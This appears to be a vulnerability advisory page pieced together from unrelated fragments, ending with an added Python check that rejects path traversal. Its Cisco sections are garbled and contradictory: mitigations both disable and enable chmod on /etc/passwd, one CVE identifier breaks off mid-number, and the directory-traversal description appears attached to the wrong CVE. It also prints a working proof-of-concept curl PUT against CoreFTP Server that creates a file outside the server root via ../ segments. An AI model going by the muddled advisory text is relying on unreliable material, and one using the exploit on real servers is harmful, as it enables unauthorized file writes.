An attacker can exploit this issue by creating a malicious directory with a crafted name, such as ../../../../../../../../etc/passwd. A successful exploit can allow an attacker to create arbitrary files on the server. This issue has been assigned the identifier CVE-2018-5407.

Cisco has assigned the following mitigations for this issue:

Do not allow directory traversal operators (..) in URLs.

Disable directory traversal for any APIs that might allow it, such as cURL and Python.

Disable chmod on critical system files (e.g., /etc/passwd).

Disable file creation via uuencode or similar utilities.

Disable ftp:// URIs.

Disable ftps:// URIs.

Disable ftps transfer via SSL.

Disable ftps transfer via FTP over TLS.

Cisco supports the following mitigations for this issue:

Restrict access to the filesystem via SFTP or FTPS.

Enable chmod on critical system files (e.g., /etc/passwd).

CVE-2018-5713

A vulnerability in the Web interface of Cisco AnyConnect Secure Mobility Client before 4.8 allows remote attackers to perform unauthorized actions via crafted HTTP requests. The vulnerability exists because the application does not properly restrict requests. An attacker can exploit this vulnerability by sending an HTTP request to the targeted system. Cisco has assigned the following vulnerability identifier: CVE-2018-57

Summary


An attacker can exploit this vulnerability by sending an HTTP request to the targeted system.

Overview of Vulnerability

Cisco has assigned the following vulnerability identifier to this issue: CVE-2018-5713. This vulnerability is also known as a cookie injection vulnerability. An attacker can exploit this issue by sending an HTTP request to the targeted system. When the targeted system processes the HTTP request, it unnecessarily generates a cookie and sends that cookie back to the attacker. An attacker can use this information to perform unauthorized actions on the targeted system, such as uploading files or accessing data without authorization.

Cisco has assigned the following mitigations for this issue: Restrict access to the filesystem via SFTP or FTPS.
Cisco supports the following mitigations for this issue: Restrict access to the filesystem via SFTP or FTPS.

Description of the vulnerability

A vulnerability in the Web interface of Cisco AnyConnect Secure Mobility Client before 4.8 allows remote attackers to perform unauthorized actions via crafted HTTP requests. The vulnerability exists because the application does not properly restrict requests. An attacker can exploit this vulnerability by sending an HTTP request to the targeted system.

Exploit

# Exploit Title: CoreFTP Server build 725 - Directory Traversal (Authenticated)
# Date: 08/01/2022
# Exploit Author: LiamInfosec
# Vendor Homepage: http://coreftp.com/
# Version: build 725 and below
# Tested on: Windows 10
# CVE : CVE-2022-22836

# Description:

CoreFTP Server before 727 allows directory traversal (for file creation) by an authenticated attacker via ../ in an HTTP PUT request.

# Proof of Concept:

curl -k -X PUT -H "Host: <IP>" --basic -u <username>:<password> --data-binary "PoC." --path-as-is https://<IP>/../../../../../../whoops
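
A server-side check that refuses the request shape in the proof of concept above, as an added example (not CoreFTP's code and not part of the original advisory). The function name `resolve_put_target` and the upload root `/srv/ftp/alice` are hypothetical; the sketch assumes POSIX-style paths under the root and does not resolve symlinks.

```python
import posixpath
from urllib.parse import unquote

UPLOAD_ROOT = "/srv/ftp/alice"  # hypothetical per-user upload root


def resolve_put_target(request_path, root=UPLOAD_ROOT):
    """Map the raw path of a PUT request to a file under root.

    Returns the normalized absolute path, or None when the request
    must be refused. The server has to do this itself: a client sending
    the path as-is performs no normalization on its side.
    """
    # Decode until stable so %2e%2e and double-encoded %252e%252e are seen.
    decoded = request_path
    for _ in range(3):
        step = unquote(decoded)
        if step == decoded:
            break
        decoded = step
    else:
        return None  # still changing after three rounds: refuse

    if "\x00" in decoded:
        return None

    # A Windows server treats backslash as a separator as well.
    segments = decoded.replace("\\", "/").split("/")
    if ".." in segments:
        return None

    rel = "/".join(s for s in segments if s not in ("", "."))
    if not rel:
        return None  # a PUT to the root itself names no file

    target = posixpath.normpath(posixpath.join(root, rel))
    # Containment check on the normalized result, independent of the
    # segment filter above.
    if not target.startswith(root.rstrip("/") + "/"):
        return None
    return target


if __name__ == "__main__":
    # Constructed sample request paths; the first is the PoC's path.
    for p in ["/../../../../../../whoops", "/reports/q1.txt", "/%2e%2e/x"]:
        print(p, "->", resolve_put_target(p))
```

On a real filesystem, follow this with a comparison of the resolved real path (symlinks expanded) against the root before opening the file for writing.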

Timeline

Published on: 01/10/2022 14:12:00 UTC
Last modified on: 01/19/2022 16:15:00 UTC

References